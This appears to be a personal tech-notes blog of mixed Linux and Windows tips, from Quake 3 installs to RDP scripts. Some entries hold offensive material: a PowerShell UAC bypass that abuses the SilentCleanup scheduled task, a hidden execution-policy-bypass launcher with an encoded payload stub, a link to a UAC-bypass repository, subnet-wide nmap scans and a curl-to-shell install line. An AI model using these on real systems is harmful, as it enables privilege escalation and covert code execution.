Tuesday, June 24, 2025

UserLand on Android

nano /etc/resolv.conf


nameserver 8.8.8.8

nameserver 8.8.4.4


Ctrl+O, Enter, and Ctrl+X.


UserLand for Android


https://github.com/debauchee/barrier

https://github.com/input-leap/input-leap

Victor Mono Font=

https://rubjo.github.io/victor-mono/


https://electronics-diy.com/micro-transmitter-bug.php





nmap -n -Pn -sS -sV -p21,22,23,80,443,445,3306,8080 --open --script=banner -T4 192.168.1.0/24 -oG - \ | grep '/open/' | grep -v 'tcpwrapped' | awk '{print $2}' | sort -u




nmap -n -Pn -sS -sV -p80 --open --script=banner -T5 192.168.1.0/24 -oG - | grep 'open' | grep -v 'tcpwrapped'

Sunday, June 22, 2025

Format USB on Windows

diskpart

list disk

select disk 1

clean

create partition primary

format fs=fat32 quick

rem -------------------------

winget upgrade

winget upgrade --all


  1. 12* 365nm UV LED 5mm

https://askubuntu.com/questions/948106/how-to-install-quake-3


https://www.videogames.ai/How-to-Install-Quake3-on-Linux



How to install Quake 3 on Linux

This is guide for how to install the legendary Quake 3 game on Linux
Step 1 - Package the game data

If you don’t have the Game Datam this will install Demo data:
game-data-packager -i quake3


If you have the full game use this:
game-data-packager -i quake3 /path/to/full/game

Step 2 - Download the Engine

This will install ioquake3 engine
sudo apt update sudo apt install quake3

Step 3 - Run the Game
quake3

Thursday, June 19, 2025

Alma Linux XFCE

Stock bash terminal is ugly and missing a LOT of quality of life features. Here is how to fix it to look good and get you around your system faster!

Linux Utility command: 

curl -fsSL christitus.com/linux | sh

++





Monday, June 16, 2025

Turska legenda

 ++


The Linux Tips and Goodies=

https://github.com/TheAssassin/AppImageLauncher


https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/

function sudo {

	$command = "powershell -noexit " + $args + ";#";
	
    Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value $command ;
    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I;
    Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir"
}


Thursday, June 12, 2025

Passthrough for Virtual Windows on Linux Host

 https://github.com/HikariKnight/quickpassthrough




https://almalinux.org/get-almalinux/











Don't let your learning lead to knowledge, you'll become a fool, let your learning lead to Action, you can become wealthy.


Stop arguing with fools, a wise man doesn't wrestle pigs, he walks away!


GOD MODE FOLDER=

God Mode.{ED7BA470-8E54-465E-825C-99712043E01C}


Windblows 11 setup on a potato - {Genije}:

https://schneegans.de/windows/unattend-generator/



Wednesday, June 11, 2025

Remotero for WINDOWS 11

 


cmdkey /add:user-PC /user:Korisnik /pass:123
mstsc /v:user-PC



@echo off
set /p host="host >> "
set /p user="username >> "
set /p pass="password >> "
cmdkey /add:%host% /user:%user% /pass:%pass% >nul
mstsc /v:%host%
cmdkey /delete:%host% >nul


How to enter in UEFI Bios after reboot? 

shutdown /r /fw /t 0



Task Manager run=

[Ctrl] + [Shift] + [ESC]







Monday, June 9, 2025

Alpine Linux AppImage Execute

 https://github.com/sgerrand/alpine-pkg-glibc/releases


# Install curl and other essentials if not already installed

apk add curl ca-certificates


# Download glibc packages

curl -Lo /etc/apk/keys/sgerrand.rsa.pub https://alpine-pkgs.sgerrand.com/sgerrand.rsa.pub

curl -Lo glibc-2.35-r1.apk https://github.com/sgerrand/alpine-pkg-glibc/releases/download/2.35-r1/glibc-2.35-r1.apk


# Install glibc

apk add glibc-2.35-r1.apk


An independent contractor or consultant for a company wanted!

https://archive.org/details/windows-7-ultimate-x-64-sp-1-fully-loaded




Sunday, June 1, 2025

Genije

++


https://www.prodavnicazdravehrane.rs/blog/psilijum-psyllium-koristi-zdravlju

https://www.beyondhealthfood.com/en/namena/organski-proizvodi/flax-seeds-organic-detail


pip install pyttsx3

import pyttsx3

engine = pyttsx3.init()

voices = engine.getProperty

engine.setProperty('voice', voices[0].id)

engine.setProperty('rate',150)

engine.say('welcome to my blog')

engine.runAndWait()


https://pngimg.com


c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -nop -ep bypass -NoExit -E asdasdasbase64gibberish==


Microsoft Text Editor for Linux

https://github.com/microsoft/edit





https://nim-lang.org/features.html

https://github.com/booIeann/UAC-Bypass

https://gist.github.com/pratyakshm/f19c106205f9327e9f1d538fb91fce65

Windblows 11 setup on a potato:

https://schneegans.de/windows/unattend-generator/